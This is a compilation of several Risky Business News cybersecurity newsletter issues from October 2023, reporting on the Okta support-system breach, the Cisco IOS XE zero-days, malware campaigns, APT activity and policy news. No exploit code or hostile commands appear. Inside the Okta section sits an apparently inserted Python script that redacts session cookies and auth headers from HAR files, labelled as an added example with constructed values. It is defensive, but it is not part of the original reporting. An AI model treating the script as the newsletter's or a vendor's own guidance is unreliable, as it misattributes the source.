Poland to finally investigate Pegasus abuse: Poland's new ruling coalition plans to create a parliamentary commission to investigate the use of Pegasus spyware by the previous government. The commission will look at how the former ruling party PiS used Pegasus to spy on opposition members, journalists, and prosecutors. The European Union has called out Poland for its use of the spyware, but the former government has never taken any action in response. [Additional coverage in Reuters]

Moldova blocks 22 Russian sites: Moldova's intelligence service has blocked access to 22 Russian news sites for engaging in an "informational war." The biggest names on the list are sites linked to RT (formerly RussiaToday), Mir TV, and Vesti FM. ISPs have been ordered to block access to the sites. The country previously suspended six Russian-language TV stations in 2022 for promoting pro-Kremlin misinformation about Russia's invasion of Ukraine.

RuNet censorship: Russia's communications watchdog Roskomnadzor says it is now blocking access to 167 VPN services and more than 200 foreign email providers. According to a rare statement from the agency, Roskomnadzor is also blocking access to more than 590,000 web pages but says that most are malicious, such as phishing and malware distribution sites. Besides a blocklist, the agency also runs a whitelist, which allegedly contains more than 17,000 IP addresses to which the agency's filtering rules are not applied. [Additional coverage in Interfax]

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Resourcely CEO Travis McPeak about the modern DevOps ecosystem, how giving developers tools with security baked in keeps everyone safe and happy, and how that's easier than expecting your software engineers to become cybersecurity experts overnight.

Cybercrime and threat intel

Arrests in Nigeria: Nigerian police's cybercrime unit has detained six suspects and dismantled a cybercrime recruitment and training hub active in the country's capital, Abuja. Officials say the group was involved in romance scams, BEC, and fraudulent investment schemes. Members also dabbled in hacking and trading social media accounts. Along with the arrests, Nigerian police urged landlords and building owners to report any similar hubs operating on their properties.

Fake PoC targets security researchers: Chinese security firm Shanshi has discovered a fake PoC for a GeoServer vulnerability (CVE-2023-25157) that was infected with the VenomRAT and used to lure and target security researchers.

Twitter malvertising: Sponsored ads from verified Twitter users are pushing online scams targeting the cryptocurrency community. Also known as another day ending with "y" on Twitter.

Octo Tempest: The hacking group behind recent breaches at Caesars and MGM casinos has used threats of physical violence and gun shootings to coerce some of their victims into handing over enterprise credentials. According to a recent Microsoft report, the threats are typically made against a company's tech support and help desk personnel. The Microsoft report is the first to officially confirm—screenshots included—that the group uses physical threats to gain initial access to victim networks. A Cyberscoop report has linked the group's members to an underground community named The Com, where members allegedly learned to SIM swap, arrange house swatting incidents, and commission real-life violence. The report also warns that the group has now expanded from simple extortion schemes to ransomware, having an active partnership with the AlphV operation. Microsoft tracks the group as Octo Tempest, but they are also known as 0ktapus, Scattered Spider, and UNC3944.

Malware technical reports

MOUSEHOLE: Dragos has published part two of a technical analysis of MOUSEHOLE, one of the five modules of PIPEDREAM, an ICS malware framework developed by the Chernovite group. See part one here.

StripedFly: A malware botnet named StripedFly is suspected to have infected more than one million Windows and Linux PCs since it first began operating in early 2017. The botnet uses the leaked NSA exploit EternalBlue to spread and comes with modules for performing network reconnaissance, harvesting credentials, and mining cryptocurrency. Security firm Kaspersky says the botnet uses a custom version of the EternalBlue exploit that was compiled before the original exploit was leaked online in April 2017. Researchers have not attributed the botnet to any particular threat actor, but infosec reporter Kim Zetter points out that a Chinese espionage group named BuckEye had been seen using the EternalBlue exploit a year before it was leaked.

Huge crypto-mining botnet: Russian security firm Positive Technologies has discovered a crypto-mining operation that has infected more than 250,000 Windows PCs. Most of the infected systems are located in Russia and other former Soviet states. The large number of infected users in the region is explained by the botnet's operators using Russian torrent sites to spread apps infected with their malware.

ScamClub landing pages: Confiant researchers have published an analysis of landing pages used by the ScamClub group. The company worked with industry partners last month to take down some of the group's infrastructure.

BlackDream ransomware: Security researchers have spotted a new ransomware family named BlackDream being used in attacks across Southeast Asia.

Rhysida ransomware: Avast researchers have published an analysis of the Rhysida ransomware, first spotted in the wild earlier this year in May.

BbyStealer returns: Symantec is seeing new campaigns leveraging the BbyStealer malware.

"The threat actors behind it have been leveraging multiple phishing websites advertising free download of Windows installers for various Virtual Private Network (VPN) applications."

DuckTail: Cluster25 looks at the DuckTail malware and its most recent campaign targeting Italian-speaking users via LinkedIn.

Craxs RAT: CyFirma has published a report on Craxs, a RAT developed by a developer based out of Syria. The latest RAT update adds a dropper component to make it easier to deploy additional payloads/malware strains.

Sponsor Demo

Listen to Resourcely CEO Travis McPeak talk with Risky Business Snake Oilers host Patrick Gray about the company's automagic Terraform cloud-provisioning technology.

APTs and cyber-espionage

Russian spying: Russian security firm Kaspersky says it discovered a Go-based backdoor that was used over the past few months to steal sensitive data from Russian government and industrial organizations. The company has not attributed the campaign to any APT group, but the operation seems to have been focused on intelligence collection.

APT28: France's cybersecurity agency, the ANSSI, has published a report reviewing APT28's latest operation techniques, dating back to 2021. The report is only available in French. An English version is likely to be published in the next weeks.

Winter Vivern: The Winter Vivern APT group has used a zero-day vulnerability to breach Roundcube webmail servers belonging to European government entities. The attacks were discovered by security firm ESET in early October, and a patch was released last week. The zero-day (CVE-2023-5631) is a stored XSS that allows the group to steal an account's emails. Prior to developing its own zero-day, ESET says the same group used older bugs to hack Roundcube and Zimbra email servers earlier this year in a different campaign. The exact same bugs were also exploited by a Russian cyber-espionage group named APT28, but ESET says Winter Vivern is a different group that may have ties to Belarus.

Operation Triangulation, part III: Kaspersky has published part three of its Operation Triangulation report. Parts one and two are here. They cover the TriangleDB malware and its modules. Part three covers the iOS exploit used to deliver the malware on targeted devices.

AridViper: Sekoia researchers have looked at the activities and internal structure of AridViper, the Hamas-linked APT group operating out of Palestine. Sekoia says the group is still active.

"AridViper seems to be organised in two subgroups, one conducting cyber espionage activities towards Israel and any entities in the Middle-East region susceptible to be involved in Palestine affairs, the second focusing on surveillance activities towards Palestinian Hamas opposition including the Fatah rival movement or individuals linked to the Palestinian Authority."

Yellow Liderc's IMAPLoader: PwC's security team looks at IMAPLoader, a new .NET malware strain employed by the Yellow Liderc Iranian APT group. The malware is named IMAPLoader because it is controlled via email messages and used to deploy additional payloads. PwC says IMAPLoader is deployed with the help of malicious JavaScript installed on watering hole sites where victims are selected based on their interests in the maritime, shipping, and logistics sectors.

Vulnerabilities, security research, and bug bounty

Google VRP expands to AI: Google has expanded its vulnerability research program to cover generative AI technologies. Named VRP for AI, the program will cover scenarios like prompt attacks, training data extraction, model manipulation, adversarial perturbations, and data model extractions. Microsoft also expanded its bug bounty program to cover AI earlier this month.

Tor Browser security audit: The Tor Project has published the results of a recent security audit of the Tor Browser and several other adjacent systems.

CISA KEV ransomware section: Nucleus Security's Patrick Garrity looks at how the new "ransomware" section in CISA KEV will impact vulnerability management and patching operations.

"Small" Windows zero-day: ACROS Security has discovered a zero-day vulnerability in Windows that can allow threat actors to prevent the OS from applying the Mark-of-the-Web on malicious documents. ACROS says that despite their finding, they "haven't found a realistic attack scenario" where the zero-day could be exploited in practice.

F5 BIG-IP RCE: Praetorian researchers have discovered a pre-auth RCE vulnerability (CVE-2023-46747) in the F5 BIG-IP load balancer. F5 has published security updates and a mitigation script, to be applied as needed. The bug has a severity rating of 9.8/10.

Grammarly vulnerability: Researchers at Salt Security have discovered a vulnerability in the OAuth implementations of Grammarly, Vidio, and Bukalapak that can be leveraged to hijack user accounts.

JS crypto vulnerabilities: Security researcher Zemnmez has found weak hashing algorithms being used in two JavaScript cryptography libraries.

Cisco IOS XE PoC: Security firm Horizon3 has published what it describes as a theoretical PoC exploit for two recent Cisco IOS XE zero-days (CVE-2023-20198 and CVE-2023-20273).

Apple security updates: Apple has released security updates for iOS. No zero-days this time. Phew!!!

iLeakage attack: A team of academics has developed a side-channel attack named iLeakage that targets Apple devices. The attack can be used to lure users to malicious web pages and then recover data from their Safari browser, such as passwords and the content of other tabs. Researchers say the attack is practical in the real world and works against Apple devices with A and M-series CPUs. The team notified Apple of the iLeakage attack in September 2022, but the company has not released any fixes.

Infosec industry

Market news: Defense company RTX is selling its cybersecurity division to private equity firm Blackstone for $1.3 billion. [Additional coverage in DefenseNews]

SOC burnout: According to a Tines survey of 900 security professionals, roughly 63% say they are experiencing some level of burnout after most saw workloads increase over the past year. Most blamed burnout problems on their SOC teams being understaffed. Even though 99% are satisfied with their job, more than half are considering switching jobs in the next 12 months for either better pay or lighter workloads.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss "spooky effects," aka when agencies play silly buggers with target computers.

Risky Biz News: 1Password joins the list of Okta victims

25 October 2023 at 00:30

This newsletter is brought to you by Resourcely, the company that can help you manage Terraform securely. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Password management service 1Password has joined the list of companies that have been impacted by a recent security breach at identity provider Okta.

1Password becomes the third company known to be affected by the Okta breach—after BeyondTrust and Cloudflare.

The Okta incident is the second major hack the company disclosed after a January 2022 incident when 366 companies had their Okta environments accessed.

This time around, we don't have a headcount for the hack just yet, but the incident is starting to look just as bad.

From public statements made by Okta, BeyondTrust, Cloudflare, and 1Password, the hack seems to have taken place somewhere at the end of September.

Okta says a threat actor used "stolen credentials" to access the account of one of its tech support engineers.

The hacker then used this account to look at tech support requests filed by Okta customers, most of which are major companies that use Okta's identity services to manage user logins into sensitive environments.

These tech support requests typically don't contain that much sensitive information, except when Okta asks customers to capture their browser traffic in the form of an HTTP Archive (HAR) file and upload it to their support case.

Okta says that some of these files contained copies of a company's Okta admin account session cookie, which the attacker extracted from the HAR and used to access customers' Okta management instance.
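The practical defence on the customer side is to strip session cookies and authorization headers from a HAR file before it is uploaded to any support portal. The following sanitizer is an added example, not Okta's or any vendor's tooling; the embedded HAR and its cookie and token values are constructed for illustration, and the `sid` cookie name is an assumption.

```python
"""Redact session cookies and auth headers from a HAR (HTTP Archive) file.

HAR is JSON: log.entries[].request/response each carry a "headers" list of
{"name", "value"} pairs and a parsed "cookies" list of the same shape. Both
can contain a live admin session cookie, which is exactly what was abused in
the Okta support-case breach. Run as: python sanitize_har.py in.har out.har
"""
import copy
import json
import sys

# Header names whose values are credentials (matched case-insensitively).
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization", "proxy-authorization"}
REDACTED = "[REDACTED]"


def _redact_headers(headers, counter):
    for header in headers:
        if header.get("name", "").lower() in SENSITIVE_HEADERS:
            if header.get("value") != REDACTED:
                header["value"] = REDACTED
                counter[0] += 1


def _redact_cookies(cookies, counter):
    # Every parsed cookie value is treated as secret; cookie names are kept so
    # support staff can still see which cookies were present.
    for cookie in cookies:
        if cookie.get("value") != REDACTED:
            cookie["value"] = REDACTED
            counter[0] += 1


def sanitize_har(har):
    """Return (sanitized deep copy, number of values redacted).

    Tokens inside request bodies or query strings are application-specific
    and are not handled here; extend this function for your own endpoints.
    """
    clean = copy.deepcopy(har)
    counter = [0]
    for entry in clean.get("log", {}).get("entries", []):
        for side in ("request", "response"):
            message = entry.get(side, {})
            _redact_headers(message.get("headers", []), counter)
            _redact_cookies(message.get("cookies", []), counter)
    return clean, counter[0]


def har_to_json(har):
    """Serialize a HAR dict; convenient for a final 'secret still present?' grep."""
    return json.dumps(har, indent=2)


# Constructed sample: one request to a tenant admin API carrying a session
# cookie and bearer token, and the response re-setting that cookie.
SAMPLE_HAR = {
    "log": {
        "version": "1.2",
        "entries": [
            {
                "request": {
                    "method": "GET",
                    "url": "https://example-tenant.invalid/api/v1/users",
                    "headers": [
                        {"name": "Cookie", "value": "sid=CONSTRUCTED_SESSION_ID"},
                        {"name": "Authorization", "value": "Bearer CONSTRUCTED_TOKEN"},
                        {"name": "Accept", "value": "application/json"},
                    ],
                    "cookies": [{"name": "sid", "value": "CONSTRUCTED_SESSION_ID"}],
                },
                "response": {
                    "status": 200,
                    "headers": [
                        {"name": "Set-Cookie", "value": "sid=CONSTRUCTED_SESSION_ID; Secure; HttpOnly"},
                        {"name": "Content-Type", "value": "application/json"},
                    ],
                    "cookies": [{"name": "sid", "value": "CONSTRUCTED_SESSION_ID"}],
                },
            }
        ],
    }
}


if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1], encoding="utf-8") as fh:
            source = json.load(fh)
    else:
        source = SAMPLE_HAR
    sanitized, count = sanitize_har(source)
    if len(sys.argv) == 3:
        with open(sys.argv[2], "w", encoding="utf-8") as fh:
            fh.write(har_to_json(sanitized))
    print(f"redacted {count} credential values")
```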

Luckily for Okta, some companies like BeyondTrust and 1Password spotted the attackers trying to log into their environments with the stolen session cookies. It's unclear how BeyondTrust spotted the intrusion, but 1Password said they spotted the attacker when it generated a report that compiled a list of all 1Password Okta admins, something that none of their staff requested.

So far, the three companies say they spotted the intruder in their Okta instance in early phases of reconnaissance, and none have seen the attacker pivot to internal systems.

Despite the happy ending for the three companies, all have put out statements expressing extreme annoyance with Okta's slow response to the breach.

BeyondTrust says it notified Okta on October 2, but it took the company 16 days to investigate and publicly acknowledge the breach; time that several security experts claim could have helped other Okta customers carry out their own investigations at the time of the breach rather than two weeks later.


Breaches, hacks, and security incidents

AlfaBank hack: The Ukrainian Security Service has collaborated with two pro-Ukrainian hacking groups to breach Alfa Bank, one of Russia's largest banks. The hack took place last week and involved members of the KibOrg and NLB hacking groups. The two groups claim to have stolen data for 30 million Alfa Bank customers and have leaked some of the stolen files. The bank denied being breached in a statement released to Russian media. Ukrainian security officials did not elaborate on the role they played in the hack. [Additional coverage in The Record]

University of Michigan breach: The University of Michigan has disclosed a security breach after hackers broke into its internal servers at the end of August. The organization says it detected the incident but not before the intruder accessed information on employees, students, alumni, donors, and contractors. The University of Michigan is one of the oldest and largest universities in the US, ranked 11th by 2022's enrollment numbers.

Gardai leak: Thousands of Irish drivers have had their driver's license information leaked online after the Irish Gardai left a server exposed on the internet. The server leaked PII, but also leaked details of insurance investigations, vehicle registration certificates, notices of car seizures, and payment card details. The leak was traced to one of the agency's IT suppliers. [Additional coverage in the Irish Independent]

DDoS attacks on Israel: Cloudflare says it spotted DDoS attacks against Israel's rocket warning alerting system as soon as 12 minutes after Hamas launched missiles at Israeli cities on October 7, the day of its attack.

Hope Lend crypto-heist: A threat actor has stolen more than $825,000 worth of crypto-assets from the Hope Lend DeFi platform. The incident is surrounded by controversy because several security firms claim that a white hat managed to beat the attacker to the exploit and is actually now in control of the funds. On the other hand, the Hope Lend developer claims the attacker paid half of the stolen funds as a bribe to a transaction validator to process the malicious transaction and that the money is now gone. [Additional coverage in Cointelegraph]

General tech and privacy

Map apps in Israel: Apple and Google have disabled their live traffic data in their map apps in Israel at the request of the Tel Aviv government. [Additional coverage in Engadget]

Chrome to get IP protection feature: Google is working on adding a feature to its Chrome browser that will hide a user's IP address behind a network of proxies. Named IP Protection, the feature is currently being tested in Chrome Canary builds. In its initial phase, the feature will use a one-hop proxy, but Google says it is aiming for a two-hop proxy system that will be harder to deanonymize. [Additional coverage in BleepingComputer]

Firefox 119: Mozilla has released Firefox 119. New features and security fixes are included. The biggest change in this release is the ability to edit PDFs.

Government, politics, and policy

Global Encryption Coalition: A global coalition of tech companies, academics, and privacy and cybersecurity experts has published an open letter asking governments across the world to stop trying to backdoor end-to-end encryption.

Security cameras across the Netherlands: Dutch officials are worried about the large number of wrongly adjusted security cameras across the country. More than 315,000 security cameras are installed across the Netherlands, and more than 55,000 belong to private individuals. The cameras are only allowed to film the owner's property, but officials say they often record public roads and other citizens' private property, in violation of GDPR. [Additional coverage in Security.nl]

Australia to get a cyber shield: Microsoft has signed an agreement with the Australian government to build a cyber shield and help the country fend off cyber-attacks. The project's official name will be the Microsoft-Australian Signals Directorate Cyber Shield, or MACS. It is a classic threat-exchange program aimed at improving the detection of threats targeting Australia. Besides MACS, Microsoft will also invest AUS$5 billion to build nine more data centers in the country, raising the total to 29.

FTC ransomware report: The US FTC has published a report on cybercrime and ransomware-related reports the agency has received over the past years. Nothing particularly interesting in this one. The FBI IC3 report provides a far better view—in our opinion—of the cyber threat landscape.

TSA security updates: The US Transportation Security Administration (TSA) announced updates to three directives regulating cybersecurity for passenger and freight railroad carriers.

CYBER.ORG donation: CISA has donated $6.8 million in funding to CYBER.ORG, a non-profit that promotes cybersecurity education in K-12 schools.

"The funding will be used to empower educators and caregivers with resources and training needed to deliver cybersecurity content to students. CYBER.ORG currently has more than 30,000 teachers across all 50 states and four US territories enrolled in its content platform, reaching millions of students nationwide."

Spamouflage in Canada: The Canadian government says that a Chinese disinformation campaign named Spamouflage is targeting lawmakers and public institutions. The operation began in early August 2023, continued through September, and relied on Facebook and Twitter bot networks. The accounts posted content accusing Canadian politicians of criminal and ethical violations and tried to silence CCP critics. Some of the posts also used deepfaked videos.

Sponsor section

In this Risky Business News sponsor interview, Catalin Cimpanu talks with Resourcely CEO Travis McPeak about the modern DevOps ecosystem, how giving developers tools with security baked in keeps everyone safe and happy, and how that's easier than expecting your software engineers to become cybersecurity experts overnight.

Cybercrime and threat intel

Spain arrests: Spain's National Police has dismantled a cybercrime group that made more than €3 million from online scams conducted via smishing, phishing, and vishing. Officials say the group impersonated delivery firms and electricity suppliers but also engaged in a scam known as the "son in distress." The group also stole and sold the personal data of four million people. Thirty-four suspects were detained last week across five Spanish cities.

Sachkov appeal: A Moscow court has rejected an appeal filed by former Group-IB CEO Ilya Sachkov to have his prison sentence overturned. Sachkov was sentenced in July to 14 years in a maximum security prison for high treason. Russian officials said Sachkov shared information on Russian citizens with foreign law enforcement agencies. It is believed information shared by Sachkov helped US authorities identify several Russian hackers and APT members. [Additional coverage in Interfax]

Hunters International: DataBreaches.net has an analysis of recent attacks carried out by an extortion group named Hunters International, which the site believes might be a rebrand of the Hive ransomware group.

Facebook malvertising: G Data analyzes a malvertising campaign that used Facebook ads to target users with malware.

Record ransomware numbers: The month of September 2023 has been the most active month for ransomware gangs on record, with 514 disclosed attacks. September 2023 beats the previous record of 459 ransomware attacks disclosed earlier this year in March. Two groups that launched last month, LostTrust and RansomedVC, ranked in the top five of most active groups. The numbers were compiled by NCC Group using data published on ransomware leak sites.

Scammers pounce on Israel-Hamas conflict: The FBI, the IRS, the FTC, and the UK government are warning citizens to be on the lookout when donating money to Israeli or Palestinian charity organizations. The agencies warn that scammers have already set up fake organizations to collect funds from individuals looking to donate to either cause. The FBI has seen fake charity schemes advertised on social media and via encrypted messaging apps. The agency says it also received complaints of legitimate Israeli email accounts being hacked and used to solicit donations.

Crypto money laundering: More than $7 billion worth of crypto-assets have been laundered through cross-chain services, with $2.7 billion laundered over the past year alone. Blockchain security firm Elliptic says cross-chain crime is rising at a faster rate than predicted. The company previously estimated that cross-chain crime would reach $6.5 billion by the end of the year and $10.5 billion by 2025. More than $2 billion worth of crypto was stolen from cross-chain services this year alone, according to rival blockchain tracking service Chainalysis.

Malware technical reports

Play ransomware: Antiy researchers have published an analysis of the Play ransomware.

Mallox ransomware: Chinese security firm Tinder Security Labs has looked at attacks against MS-SQL databases with the Mallox ransomware.

Cactus ransomware: SecurityScorecard's Vlad Pasca has a technical breakdown of the Cactus ransomware, first spotted back in March 2023.

Crypto-mining botnet: Kaspersky has a breakdown of a crypto-mining botnet targeting Windows systems. Besides the crypto-mining feature, the malware used in this attack also comes with backdoor and keylogging functionality. The botnet has been active since May this year and has infected around 200 users.

Cobalt Strike: Embee has three blog posts on analyzing Cobalt Strike payloads.

GoPIX: Russian security firm Kaspersky has spotted a new banking trojan that targets the Brazilian financial sector. Named GoPIX, the malware has been active since December 2022 and targets users of the PIX money transfer system.

Grandoreiro: Proofpoint has discovered new versions of the Grandoreiro banking trojan that targets financial institutions outside Brazil. The new version has been seen targeting the users of Mexican and Spanish banks. This marks a rare instance where malware designed for Brazil's unique financial sector targets banks in the EU.

XWorm: Poland's CERT team has reverse-engineered XWorm, a popular remote access trojan.

Origin Logger: OALABS analyzes Origin Logger, a new .NET stealer and a possible clone/successor for the old and extremely popular Agent Tesla malware.

Riddle: ThreatMon looks at Riddle, a new infostealer advertised on the hacking underground, with possible ties to a Russian developer.

Sponsor Demo

Listen to Resourcely CEO Travis McPeak talk with Risky Business Snake Oilers host Patrick Gray about the company's automagic Terraform cloud-provisioning technology.

APTs and cyber-espionage

Operation Triangulation: Kaspersky researchers have published a second analysis of TriangleDB, the iOS spyware implant that was deployed as part of Operation Triangulation. The operation targeted Russian government officials, foreign diplomats working in Russia, and Kaspersky employees. Russia's FSB intelligence service linked the attack to the NSA and claimed Apple cooperated with the American spy agency. The first report focused on the implant itself. The second focuses on two pre-infection components that attackers used to triage victims and four TriangleDB modules. These modules allow attackers to track the victim via GPS location data, record through the microphone as long as the battery has more than a 10% charge, and steal the device's keychain and SQLite files that store a phone's passwords and configuration data.

Vulnerabilities, security research, and bug bounty

Zcash security audit: NCC Group has conducted a security audit of the Zcash FROST protocol.

Single App Mode escape: WithSecure researchers have published details about an escape of Single App Mode, a feature that locks an iOS device to run a single application. This has no fix from Apple since the company does not consider it a vulnerability.

Orthanc vulnerability: Shielder researchers have published an analysis of CVE-2023-33466, a vulnerability in Orthanc, an open-source software to manage, exchange, and visualize medical imaging data.

"A quick lookup on Shodan (by searching for the authentication realm "Orthanc Secure Area") returned ~1700 exposed instances. We have developed a quick script to check for (probable) presence of the vulnerability here.

At the time of writing, ~20 hosts are publicly exposed with default credentials and with the arbitrary overwrite endpoint unrestricted. We urge every administrator that is using Orthanc in their systems to change the default/weak credentials and upgrade the software."

CitrixBleed: Assetnote researchers have published an analysis of CVE-2023-4966, a vulnerability in Citrix ADC and NetScaler devices that was patched on October 10. According to Mandiant, the vulnerability was exploited in the wild since the end of August. Assetnote named the vulnerability CitrixBleed because it can leak session tokens from Citrix devices and bypass authentication.

Cisco IOS XE update: The threat actor behind the attacks on Cisco IOS XE devices has added a protection mechanism (an HTTP authorization header) to the malware it planted on hacked devices. The protection mechanism has prevented some security firms from tracking the number of infected devices, but after tweaks to their scanners, it appears that ~38,000 devices are still infected. A tool to detect the new implant configuration is available here.

Infosec industry

HITB2023HKT videos: Talks from the Hack In The Box 2023 Phuket security conference, which took place back in late August, are available on YouTube.

Truesec layoffs: Cybersecurity firm Truesec has laid off some of its cybersecurity experts. Numbers are unclear so far. Still in the early reporting phase.

Patch Tuesday anniversary: Microsoft's monthly Patch Tuesday security updates turned 20 this month, with the program having launched in October 2003.

Pwn2Own Toronto: The mobile and IoT edition of the Pwn2Own hacking contest is taking place in Toronto, Canada. See the schedule and live results.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq discuss "spooky effects," aka when agencies play silly buggers with target computers.

Risky Biz News: Cisco IOS XE hackers are hiding their tracks as patches come out

23 October 2023 at 00:30

This newsletter is brought to you by Resourcely, the company that can help you manage Terraform securely. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

Over the past three days—since our last newsletter edition—the situation around the latest zero-day attacks targeting Cisco IOS XE devices has drastically changed, and we feel the need to cover it in our featured section and provide a short summary of what has been going on.

Although these attacks have been taking place since at least September 28, news of this campaign came out last Monday, on October 16, when Cisco revealed the existence of a zero-day tracked as CVE-2023-20198 in the web administration panel of its IOS XE operating system.

The zero-day allowed threat actors to create an admin account with the highest level of privileges on devices that had their WebUI panel exposed on the internet.

The investigation that continued throughout last week revealed the presence of a second zero-day that allowed the attackers to use the admin account they created to inject commands into the IOS XE filesystem that would execute with root privileges.

Cisco said the exploit chain was being used to inject a Lua-based backdoor on devices across the world.

The company initially thought the second zero-day was a bug fixed in 2021 and tracked as CVE-2021-1435, but in a surprising update late on Friday, Cisco said the attackers were actually using a new zero-day altogether, which it is now tracking as CVE-2023-20273.

Nevertheless, Cisco and CISA both confirmed that CVE-2021-1435 was also being exploited in the wild but in a different campaign and by another threat actor.

But that's not the only thing that happened over the past weekend. The most interesting thing is that the Lua backdoor that was placed on all the hacked Cisco IOS XE devices since late September started disappearing.

Estimates from Censys and Shadowserver put the number of hacked devices at around 42,000 IOS XE routers and switches. That number remained steady until this weekend when it suddenly dropped to around 500-1,000.

Several theories exist as to what happened, ranging from law enforcement intervention (FBI doing its thing again) to a white-hat cleaning infected systems and even Cisco itself cleaning customer devices.

However, it is very likely that this action was performed by the threat actor itself. The Lua backdoor was not a particularly strong persistence system, since it could be removed with a device reboot, and its public visibility was attracting too much attention to the attacker's operations.

As several security researchers have pointed out, the removal of the Lua backdoor may have also been accompanied by instructions that may have compromised devices in other ways and in the long run—similar to how Chinese hackers evaded Barracuda patches earlier this year and entrenched themselves so deep in the compromised appliances that Barracuda ended up telling customers to replace their gear to be safe.

In the meantime, Cisco delivered on a promise it made on Friday and released patches for both zero-days on Sunday.

Applying the latest patches will not be a one-and-done operation for your IT teams. It will be just the beginning of a sprawling security audit of what happened on that device over the last month.

As for who is behind this campaign, nobody in infosec has yet even tried to make an attribution.

The groups that are interested in Cisco IOS XE gear include almost everyone, from hacktivists to APTs and from initial access brokers to proxy botnet operators.

Attribution would require looking at artifacts from a Cisco IOS XE device, and the people who have looked at that kind of stuff are still staying silent.

If there's one good thing to take away from this, it's that Cisco's own security teams discovered both zero-days while investigating a customer support ticket—unlike similar equipment vendors that either don't look or don't have security teams.

Unfortunately, the bad thing is that they discovered this zero-day exploit chain about the same time they discovered another zero-day—CVE-2023-20109. This suggests there's one or more threat actors specifically looking for bugs in Cisco IOS XE devices, and they appear to have been extremely successful.

Breaches, hacks, and security incidents

Okta breach: A threat actor has compromised the account of an Okta support staffer and accessed the data of some of the company's customers. The attacker had access to Okta's support network for more than two weeks, from October 2 to October 18. Okta says the intruder only stole HTTP archive files that the company requires customers to upload to their customer support portal for debugging purposes. Okta says it notified all customers whose data was accessed in the breach. Public victims known so far include Cloudflare and BeyondTrust, which first detected the breach and was the one that notified Okta.

Philippines security breach: A hacker claims to have gained access to multiple Filipino government websites and downloaded gigabytes of data. Named DiabloX Phantom, the hacker claims to have gained access to the sites due to weak admin passwords, such as "Admin123." He claims to be 19 years old and a former red-teamer who just wants to highlight the government's weak security practices. Known victims of his hacking spree include the websites for the Philippines House of Representatives, the national police's forensics database, the Philippine Statistics Authority, and the country's national health insurance corporation. The hacker released sample data as proof of his intrusions. [Additional coverage in SCMP]

Philadelphia email breach: Officials with the City of Philadelphia are investigating a potential security breach of the city's email server that may have taken place in late May. [Additional coverage in the Philadelphia Inquirer]

BGRS cyberattack: The Lockbit ransomware gang has hit the network of Brookfield Global Relocation Services, a company that helps the Canadian military move troops, materials, and facilities around the world. The company's website has been offline for more than three weeks, since late September. The company told the Canadian government that the attackers gained access to the personal data of government personnel. [Additional coverage in CBC]

DCBOE hack: The District of Columbia Board of Elections has updated its data breach disclosure to confirm that hackers gained access to the District's entire voter roll information. The agency confirmed the breach after a hacker started selling the agency's data on an underground hacking forum.

ICC hack: The International Criminal Court says the security breach it suffered at the end of September was "a targeted and sophisticated attack with the objective of espionage." The organization did not reveal which state actor was behind the incident.

Jabber.ru MitM: The administrators of the Jabber.ru instant messaging service have discovered a Man-in-the-Middle attack that was intercepting encrypted TLS traffic going through its German servers. Admins say the active interception lasted for three months between July 18 and October 18 and was discovered when one of the attackers' certificates expired. Because the attack required cooperation from web hosting providers Hetzner and Linode, the Jabber.ru team believes the interception may have been a law enforcement operation.

"All jabber.ru and xmpp.ru communications between these dates should be assumed compromised. Given the nature of the interception, the attacker has been able to execute any action as if it is executed from the authorized account, without knowing the account password. This means that the attacker could download the account's roster, lifetime unencrypted server-side message history, send new messages or alter them in real time."

Potential Meta breach: A threat actor is claiming to sell access to Meta's law enforcement portal, where agents file legal requests for the company's services. Unconfirmed for now.


General tech and privacy

Clearview AI overturns ICO fine: American facial recognition company Clearview AI has won a court case against the UK's privacy watchdog and has overturned a £7.5 million fine the ICO imposed on the company in May 2022. Clearview made the case that it only sells its services to foreign governments and their law enforcement agencies. The court sided with the company, which argued the ICO does not have jurisdiction over the affairs of foreign governments. Personal note: This is quite an interesting decision since the original fine was for illegally collecting the data of UK citizens, not for whom Clearview sold it to. The British court system still remains a mystery to us, mere mortals. [Additional coverage in the BBC]

Google Falcon: Google Cloud has announced Falcon, a new low-latency hardware-assisted transport layer designed to speed up Ethernet connections in data centers.

Microsoft Security Copilot: Microsoft Security Copilot is now in early access. This is a GPT-4-like assistant to help security professionals with incident response investigations and other security tasks.

Discord moderation: Discord has changed its terms of service and will now give out warnings instead of permanent bans. If users break the rules too often, they'll have access cut off to some core Discord features, such as sending DMs, posting images, and more. [Additional coverage in Forbes]

Twitch opens up: Twitch is finally going to allow streamers to broadcast on multiple platforms at once. The move comes after the company lost major streamers to new platforms, all of which allow simultaneous multi-platform streaming. [Additional coverage in The Verge]

OpenSSL update: The OpenSSL project has added support for the Raw Public Keys protocol.

Twitter disinformation continues: A study has found that Twitter verified blue check users pushed 74% of the most viral dis/misinformation surrounding the Israel-Hamas conflict over the past week. [Additional coverage in AdWeek]

Government, politics, and policy

EU chat control legislation: The EU postponed the vote on its chat control legislation for the second time last week.

AD security guide: France's cybersecurity agency ANSSI has published a guide on securing Active Directory (AD) networks. The guide is only available in French for now.

StopRansomware guide: US cybersecurity agencies have published an update on their StopRansomware guide. The new update comes with new prevention tips for hardening SMB protocols, revised response steps, and added threat-hunting insights.

Crypto-mixers to be designated money laundering tools: The US Treasury Department's Financial Crimes Enforcement Network (FinCEN) has proposed rules that would designate cryptocurrency-mixing services as money laundering tools. The new rules would allow US authorities to impose sanctions and seize funds more easily. Officials cited the use of such tools by groups like Hamas and North Korea.

US GOP drama: Rep. Andrew Garbarino (R-NY) told Cyberscoop that the lack of an elected House speaker is delaying US lawmakers from advancing crucial cybersecurity legislation.

TSA cybersecurity lagging behind: A DHS OIG report [PDF] has found that high-value asset systems operated by the Transportation Security Administration have serious cybersecurity deficiencies. [Additional coverage in Federal News Network]

Facial recognition coming to Login.gov: The US government is adding facial recognition technology to its Login.gov single sign-on service. The new tech is scheduled to roll out next year. Users who don't want their face scanned to access government services will have a second digital identity verification option available, but the government hasn't decided what it will be yet. [Additional coverage in NextGov]

